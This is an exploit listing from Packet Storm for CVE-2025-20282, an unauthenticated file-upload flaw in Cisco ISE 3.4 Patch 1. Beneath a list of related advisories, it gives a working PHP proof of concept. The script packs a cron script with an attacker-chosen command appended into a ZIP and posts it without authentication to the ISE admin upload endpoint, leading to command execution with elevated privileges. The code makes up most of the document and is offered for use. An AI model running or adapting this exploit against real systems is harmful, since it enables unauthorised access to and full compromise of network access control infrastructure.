📄 Cisco ISE 3.4 Code Execution / Privilege Escalation / Shell Upload

🗓️ 21 Jan 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 160 Views

Unauthenticated ZIP upload flaw in Cisco ISE 3.4 Patch 1 enables arbitrary command execution and privilege escalation.

Reporter	Title	Published	Views	Family All 26
GithubExploit	Exploit for CVE-2026-20180	21 Apr 202615:21	–	githubexploit
ATTACKERKB	CVE-2025-20282	25 Jun 202517:15	–	attackerkb
BDU FSTEC	The vulnerability of the private application programming interface of the Cisco Identity Services Engine (ISE) management platform allows a perpetrator to execute arbitrary code.	27 Jun 202500:00	–	bdu_fstec
Circl	CVE-2025-20282	25 Jun 202516:47	–	circl
Cisco	Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities	25 Jun 202516:00	–	cisco
Tenable Nessus	Cisco Identity Services Engine (cisco-sa-ise-unauth-rce-ZAd2GnJ6)	25 Jun 202500:00	–	nessus
CNNVD	Cisco ISE和Cisco ISE-PIC 安全漏洞	25 Jun 202500:00	–	cnnvd
CNVD	Cisco ISE and ISE-PIC File Upload Vulnerability	26 Jun 202500:00	–	cnvd
CVE	CVE-2025-20282	25 Jun 202516:29	–	cve
Cvelist	CVE-2025-20282 Cisco ISE API Unauthenticated Remote Code Execution Vulnerability	25 Jun 202516:29	–	cvelist

=============================================================================================================================================
    | # Title     : Cisco ISE 3.4 Patch 1 Unauthenticated Arbitrary File Upload via ZIP Injection                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.cisco.com                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/210756/ & CVE-2025-20282
    
    [+] Summary    : An unauthenticated file upload vulnerability was identified in the administrative file upload endpoint. 
                     The application accepts ZIP archives without authenticationand extracts files into sensitive execution paths.
                     An attacker can craft a ZIP archive containing a modified cron shell script
                     and upload it to the vulnerable endpoint, leading to arbitrary command execution.
    
    [+] Impact:
    
    - Remote Command Execution
    - Privilege Escalation
    - Full System Compromise
    
    [+] Attack Vector:
    
    Remote / Network
    
    [+] PoC : php poc.php --ip 192.168.1.100 --command "malicious_command_here"
    
    <?php
    
    if (php_sapi_name() !== 'cli') {
        die("This script must be run from CLI only.\n");
    }
    
    /* ---------------- Argument Parsing ---------------- */
    
    $options = getopt("", ["reset", "command:", "ip:"]);
    
    if (!isset($options['command']) || !isset($options['ip'])) {
        echo "Usage: php poc.php --command=\"<cmd>\" --ip=\"<target>\" [--reset]\n";
        exit(1);
    }
    
    $COMMAND = $options['command'];
    $IP      = $options['ip'];
    $RESET   = isset($options['reset']);
    
    /* ---------------- Original Encoded Payload ---------------- */
    
    /**
     * Original file under /opt/CSCOcpm/bin/
     * Filename: isehourlycron.sh
     */
    $isehourlycron = "++++++"; // Base64 placeholder
    
    $decoded_data = base64_decode($isehourlycron);
    
    /* ---------------- File System Setup ---------------- */
    
    $binDir = __DIR__ . "/bin";
    if (!is_dir($binDir)) {
        mkdir($binDir, 0755, true);
    }
    
    $filePath = $binDir . "/isehourlycron.sh";
    
    /* ---------------- Write Logic ---------------- */
    
    $fileHandle = fopen($filePath, "w");
    fwrite($fileHandle, $decoded_data);
    
    if ($RESET) {
        echo "[+] File has been reset\n";
    } else {
        fwrite($fileHandle, $COMMAND);
    }
    
    fclose($fileHandle);
    
    /* ---------------- ZIP Creation ---------------- */
    
    $zipFile = __DIR__ . "/output.zip";
    $zip = new ZipArchive();
    
    if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
        die("[-] Cannot create zip archive\n");
    }
    
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($binDir),
        RecursiveIteratorIterator::LEAVES_ONLY
    );
    
    foreach ($files as $name => $file) {
        if (!$file->isDir()) {
            $filePath = $file->getRealPath();
            $relativePath = substr($filePath, strlen(__DIR__) + 1);
            $zip->addFile($filePath, $relativePath);
        }
    }
    
    $zip->close();
    
    /* ---------------- Upload via cURL ---------------- */
    
    echo "[*] Uploading file unauthenticated...\n";
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => "https://" . $IP . "/admin/files-upload/",
        CURLOPT_POST           => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_POSTFIELDS     => [
            'file' => new CURLFile($zipFile)
        ]
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "[+] Upload completed\n";
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

21 Jan 2026 00:00Current

6Medium risk

Vulners AI Score6

CVSS 3.110

EPSS0.09805

SSVC